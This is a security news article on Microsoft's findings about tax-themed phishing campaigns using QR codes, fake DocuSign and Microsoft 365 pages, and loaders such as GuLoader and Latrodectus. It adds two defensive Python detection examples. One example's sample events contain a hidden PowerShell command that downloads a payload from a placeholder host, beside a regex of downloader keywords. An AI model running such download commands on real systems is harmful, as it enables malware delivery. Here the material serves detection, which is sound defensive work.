Microsoft Warns of Tax-Themed Phishing Surge Using QR Codes, Malware, and Credential Theft Tools
Microsoft has raised the alarm over a wave of phishing campaigns exploiting tax season themes to spread malware and steal user credentials. These attacks cleverly use redirection tactics like QR codes, shortened URLs, and trusted file-hosting platforms to slip past detection systems.

A New Breed of Phishing-as-a-Service
At the heart of these campaigns is a Phishing-as-a-Service (PhaaS) platform known as RaccoonO365, first exposed in December 2024. Threat actors are leveraging this tool to deploy remote access trojans (RATs) such as Remcos, and post-exploitation tools including Latrodectus, AHKBot, GuLoader, and BruteRatel C4 (BRc4).
One particularly active group, Storm-0249—a known initial access broker—was spotted on February 6, 2025, conducting a phishing campaign targeting U.S. users. Victims received emails with PDF attachments linking to shortened URLs that redirected them to fake DocuSign pages. From there, JavaScript payloads could lead to malware like BRc4 and Latrodectus, depending on the user's system profile and IP address. If the target didn’t meet the attackers’ criteria, a harmless PDF was sent instead.
Mass Targeting & QR Code Deception
Between February 12 and 28, Microsoft observed another large-scale phishing operation delivering QR code-laced PDFs to over 2,300 U.S. organizations, especially in engineering, IT, and consulting sectors. The QR codes redirected victims to phony Microsoft 365 login pages, designed to harvest credentials via RaccoonO365.
Expanding the Arsenal
Other malware strains were also distributed using tax-themed lures:
- AHKBot: Victims were led to Excel documents that downloaded MSI files executing AutoHotKey scripts, which enabled screenshot capturing and exfiltration.
- GuLoader: Embedded links in PDF attachments led to ZIP files containing .lnk files disguised as tax documents. When opened, these used PowerShell to deploy GuLoader and install Remcos.
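The two delivery chains just described (Excel document to MSI to AutoHotKey script, and a .lnk that hands off to PowerShell) leave a recognisable parent/child footprint in process-creation telemetry. The following is an added example written for this article, not code from Microsoft: it runs three simple rules over process events. The event schema (parent_image, image, cmdline) and the sample events are constructed for the example and do not come from any real EDR product.

```python
"""Added example, not from the Microsoft report: match the delivery chains described
above (Excel -> MSI -> AutoHotkey script; .lnk -> PowerShell downloader) against
process-creation events. Event schema and sample events are constructed for this example."""
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LAUNCHERS = {"msiexec.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
# Strings that commonly appear when PowerShell is used to fetch a second stage.
DOWNLOAD_HINTS = re.compile(r"invoke-webrequest|downloadstring|downloadfile|net\.webclient|-enc|bitsadmin", re.I)

# Constructed events (invented schema): parent image, image, command line.
SAMPLE_EVENTS = [
    {"parent_image": "explorer.exe", "image": "excel.exe",
     "cmdline": r"excel.exe C:\Users\alice\Downloads\W2_2024.xlsx"},
    {"parent_image": "excel.exe", "image": "msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\AppData\Local\Temp\tax_form.msi /qn"},
    {"parent_image": "msiexec.exe", "image": "autohotkey.exe",
     "cmdline": r"autohotkey.exe C:\Users\alice\AppData\Roaming\capture.ahk"},
    {"parent_image": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -w hidden -c Invoke-WebRequest https://example.invalid/g.bin -OutFile %TEMP%\g.bin"},
    {"parent_image": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem"},
]


def rule_office_spawns_launcher(ev):
    """An Office application should not normally start an installer or script host."""
    return ev["parent_image"].lower() in OFFICE_APPS and ev["image"].lower() in LAUNCHERS


def rule_autohotkey_from_userdir(ev):
    """AutoHotkey running a script dropped under a user-writable directory."""
    img = ev["image"].lower()
    cl = ev["cmdline"].lower()
    return img.startswith("autohotkey") and ".ahk" in cl and ("\\appdata\\" in cl or "\\temp\\" in cl)


def rule_shell_download_from_explorer(ev):
    """A double-clicked .lnk shows up as explorer.exe launching the shell it points at."""
    return (ev["parent_image"].lower() == "explorer.exe"
            and ev["image"].lower() in {"powershell.exe", "pwsh.exe", "cmd.exe"}
            and bool(DOWNLOAD_HINTS.search(ev["cmdline"])))


RULES = {
    "office_spawns_launcher": rule_office_spawns_launcher,
    "autohotkey_script_from_user_dir": rule_autohotkey_from_userdir,
    "explorer_shell_downloader": rule_shell_download_from_explorer,
}


def detect(events):
    """Return (rule_name, event) for every event that a rule matches."""
    return [(name, ev) for ev in events for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, ev in detect(SAMPLE_EVENTS):
        print(f"[{name}] {ev['parent_image']} -> {ev['image']}: {ev['cmdline']}")
```

Run against the constructed events, the benign Excel launch and the interactive PowerShell session produce nothing, while the three links of the delivery chains each trigger one rule. In a real environment the same logic would be expressed in the query language of whichever telemetry source is in use, with the parent/child pairs tuned to what is normal for that fleet.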
Microsoft also highlighted a related Storm-0249 campaign leveraging fake Windows 11 Pro ads, promoted via Facebook, to deliver Latrodectus through BruteRatel. The latest variant, Latrodectus 1.9, now includes persistence via scheduled tasks and a new command to execute Windows instructions via cmd.exe /c.
QR Code Abuse and Broader Threat Trends
According to Palo Alto Networks Unit 42, these QR code-based phishing attacks often obscure the true destination by using redirects or open redirect vulnerabilities on legitimate sites, hiding malicious links from both users and security tools.
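Once a QR code has been decoded it is just another URL, and the obfuscation Unit 42 describes (a shortener, or an open-redirect parameter on a legitimate site) can be unwrapped statically before anything is fetched. The following is an added example written for this article, not code from Microsoft or Unit 42: it pulls URLs out of a message body, follows nested redirect parameters without network access, and flags shorteners and lookalike brand hosts. The shortener list, the brand list and the sample email body are constructed for the example.

```python
"""Added example, not code from Microsoft or Unit 42: statically unwrap the URL
obfuscation described above (shorteners, open-redirect parameters on trusted hosts)
and flag lookalike brand domains, without touching the network."""
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed lists for this example; a real deployment would feed its own intel here.
SHORTENER_HOSTS = {"bit.ly", "tinyurl.com", "t.co", "is.gd", "rebrand.ly"}
TRUSTED_BRANDS = {"microsoft.com", "docusign.com", "dropbox.com", "adobe.com", "canva.com", "zoho.com"}

# Constructed sample email body standing in for a tax-themed lure; the QR payload is
# shown already decoded, since a QR reader simply yields a URL.
SAMPLE_EMAIL = """Your 2024 tax refund statement is ready.
Review it here: https://trusted-example.com/redirect?url=https%3A%2F%2Fmicrosoft365-login.example.net%2Fauth
Or scan the QR code (decoded payload): https://bit.ly/abc123
Sign-in help: https://login.microsoft.com/common/oauth2
"""

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")


def base_domain(host):
    """Registrable-domain approximation (last two labels); adequate for the demo."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def embedded_urls(url):
    """Return full URLs carried inside query parameters, e.g. ?url=https://... (open-redirect style)."""
    query = urlparse(url).query
    found = []
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            value = unquote(value)  # parse_qs decoded once; this also catches double-encoded values
            if value.lower().startswith(("http://", "https://")):
                found.append(value)
    return found


def analyze_url(url, max_hops=5):
    """Follow nested redirect parameters statically and explain why a URL looks suspicious."""
    chain = [url]
    reasons = []
    current = url
    for _ in range(max_hops):
        nested = embedded_urls(current)
        if not nested:
            break
        reasons.append(f"redirect parameter on {urlparse(current).hostname}")
        current = nested[0]
        chain.append(current)
    for hop in chain:
        host = (urlparse(hop).hostname or "").lower()
        if base_domain(host) in SHORTENER_HOSTS:
            reasons.append(f"shortener {host}")
    final_host = (urlparse(current).hostname or "").lower()
    for brand in TRUSTED_BRANDS:
        name = brand.split(".")[0]
        # Brand name present in the host, but the registrable domain is not the brand's own.
        if name in final_host and base_domain(final_host) != brand:
            reasons.append(f"lookalike of {brand}: {final_host}")
    return {"url": url, "chain": chain, "final_host": final_host, "reasons": reasons, "suspicious": bool(reasons)}


def triage(text):
    """Extract every URL from a message body and return only the suspicious ones."""
    return [r for r in (analyze_url(u) for u in URL_RE.findall(text)) if r["suspicious"]]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EMAIL):
        print(hit["url"], "->", hit["final_host"], "|", "; ".join(hit["reasons"]))
```

The static unwrap cannot see server-side redirects (a shortener's real target only appears after an HTTP request), which is exactly why a shortener hop is itself reported as a reason rather than silently followed. The genuine login.microsoft.com link in the sample passes because its registrable domain matches the brand.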
This surge in phishing also coincides with broader social engineering trends, including:
- Browser-in-the-Browser (BitB) attacks targeting Steam users
- Info-stealers hijacking MailChimp accounts for spam campaigns
- Malicious SVG files bypassing spam filters to redirect victims
- Use of trusted platforms (Adobe, DocuSign, Dropbox, Canva, Zoho) to sneak past secure email gateways
- Fake emails from Spotify, Apple Music, and banks aiming to capture credentials and payment data
- Bogus alerts about security issues on Windows and macOS
- Trojanized downloads for popular software leading to Gh0st RAT
- DarkCloud and Masslogger info-stealers targeting Spanish and Romanian entities respectively
Defense Recommendations
To combat these evolving threats, Microsoft advises organizations to:
- Implement phishing-resistant authentication methods
- Use modern browsers with malicious site protection
- Enable network-level protections to block access to harmful domains
Staying ahead of these increasingly creative and deceptive phishing strategies is critical, especially during periods like tax season, when threat actors are most active.